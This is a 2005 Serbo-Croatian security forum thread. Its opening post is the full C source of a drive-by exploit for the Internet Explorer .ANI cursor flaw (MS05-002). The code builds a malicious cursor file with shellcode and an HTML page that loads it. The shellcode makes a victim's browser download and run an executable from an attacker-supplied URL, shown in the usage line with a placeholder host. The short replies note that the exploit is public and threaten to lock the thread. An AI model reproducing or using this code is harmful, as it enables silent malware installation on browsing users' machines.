Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Microsoft Internet Explorer .ANI Files Handling Downloader Exploit (MS05-002)

[es] :: Security Coding :: Microsoft Internet Explorer .ANI Files Handling Downloader Exploit (MS05-002)

[ Pregleda: 3685 | Odgovora: 5 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Vertyg01
Banjaluka

Član broj: 39881
Poruke: 41
*.broadband.blic.net.

ICQ: 35878878


Profil

icon Microsoft Internet Explorer .ANI Files Handling Downloader Exploit (MS05-002)24.01.2005. u 18:53 - pre 233 meseci
#include <stdio.h>
#include <stdlib.h>


/* ANI header */
unsigned char aniheader[] =
"\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

/* jmp offset, no Jitsu */
"\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90"
"\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00"
"\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00"
"\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00"
"\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00"
"\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00"
"\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";


/* portbind shellcode */
unsigned char shellcode[] =
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!";

unsigned char discl[] =
"This is provided as proof-of-concept code only for educational"
" purposes and testing by authorized individuals with permission"
" to do so.";

unsigned char html[] =
"<html>\n"
"(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit"
"<br>Copyright (c) 2004-2005 .: houseofdabus :.<br><a href =\""
"http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx\">"
"Patch (MS05-002)</a>\n"
"<script>alert(\"%s\")</script>\n<head>\n\t<style>\n"
"\t\t* {CURSOR: url(\"%s.ani\")}\n\t</style>\n</head>\n"
"</html>";


unsigned short
fixx(unsigned short p)
{
unsigned short r = 0;
r = (p & 0xFF00) >> 8;
r |= (p & 0x00FF) << 8;

return r;
}

void
usage(char *prog)
{
printf("Usage:\n");
printf("%s <file> <url to file>\n\n", prog);
printf("eg: %s index http://www.somehost.net/proggy.exe\n\n", prog);
exit(0);
}


int
main(int argc, char **argv)
{
FILE *fp;
unsigned short port;
unsigned char f[256+5] = "";
unsigned char anib[912] = "";
int x=0;

printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n");
printf("\tCopyright (c) 2004-2005 .: houseofdabus :.\n\n\n");
printf("\tModified somewhere ...\n\n\n");

printf("%s\n\n", discl);
if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
printf("[-] Size of shellcode must be <= 686 bytes\n");
return 0;
}
if (argc < 3) usage(argv[0]);

if (strlen(argv[1]) > 256) {
printf("[-] Size of filename must be <=256 bytes\n");
return 0;
}

strcpy(f, argv[1]);
strcat(f, ".ani");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can\'t create file: %s\n", f);
return 0;
}
x= sizeof(shellcode)+strlen(argv[2])+1;
unsigned char newshellcode[x];
memset(newshellcode,0x90,sizeof(shellcode)+strlen(argv[2])+1);
strcpy(newshellcode,shellcode);
strcat(newshellcode,argv[2]);
strcat(newshellcode,"\x01");
memset(anib, 0x90, 912);
memcpy(anib, aniheader, sizeof(aniheader)-1);
memcpy(anib+sizeof(aniheader)-1, newshellcode, sizeof(newshellcode)-1);
fwrite(anib, 1, 912, fp);
printf(" Ok\n");
fclose(fp);
f[0] = '\0';
strcpy(f, argv[1]);
strcat(f, ".html");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can\'t create file: %s\n", f);
return 0;
}
sprintf(anib, html, discl, argv[1]);
fwrite(anib, 1, strlen(anib), fp);
printf(" Ok\n");
fclose(fp);

return 0;
}
 
Odgovor na temu

DownBload

Član broj: 1333
Poruke: 310
*.net.t-com.hr.



Profil

icon Re: Microsoft Internet Explorer .ANI Files Handling Downloader Exploit (MS05-002)24.01.2005. u 22:03 - pre 233 meseci
Ukoliko nitko nema nista pametno za reci u vezi ovog topica, lockam ga. Postanje
exploitova koje se ionako moze bez problema naci u public arhivama nema nikakvog smisla.
Leon Juranic
 
Odgovor na temu

Vertyg01
Banjaluka

Član broj: 39881
Poruke: 41
*.broadband.blic.net.

ICQ: 35878878


Profil

icon Re: Microsoft Internet Explorer .ANI Files Handling Downloader Exploit (MS05-002)24.01.2005. u 22:34 - pre 233 meseci
Ovaj jos nije public ;)
mozda ce tek da bude ...
 
Odgovor na temu

Vertyg01
Banjaluka

Član broj: 39881
Poruke: 41
*.broadband.blic.net.

ICQ: 35878878


Profil

icon Re: Microsoft Internet Explorer .ANI Files Handling Downloader Exploit (MS05-002)24.01.2005. u 22:35 - pre 233 meseci
Evo ga izasao je ...
http://www.milw0rm.com/
 
Odgovor na temu

Sundance

Član broj: 7510
Poruke: 2559
*.sava.sczg.hr.



Profil

icon Re: Microsoft Internet Explorer .ANI Files Handling Downloader Exploit (MS05-002)24.01.2005. u 22:49 - pre 233 meseci
Izašao jučer.
 
Odgovor na temu

Vertyg01
Banjaluka

Član broj: 39881
Poruke: 41
*.broadband.blic.net.

ICQ: 35878878


Profil

icon Re: Microsoft Internet Explorer .ANI Files Handling Downloader Exploit (MS05-002)24.01.2005. u 23:02 - pre 233 meseci
Bindport ....
 
Odgovor na temu

[es] :: Security Coding :: Microsoft Internet Explorer .ANI Files Handling Downloader Exploit (MS05-002)

[ Pregleda: 3685 | Odgovora: 5 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.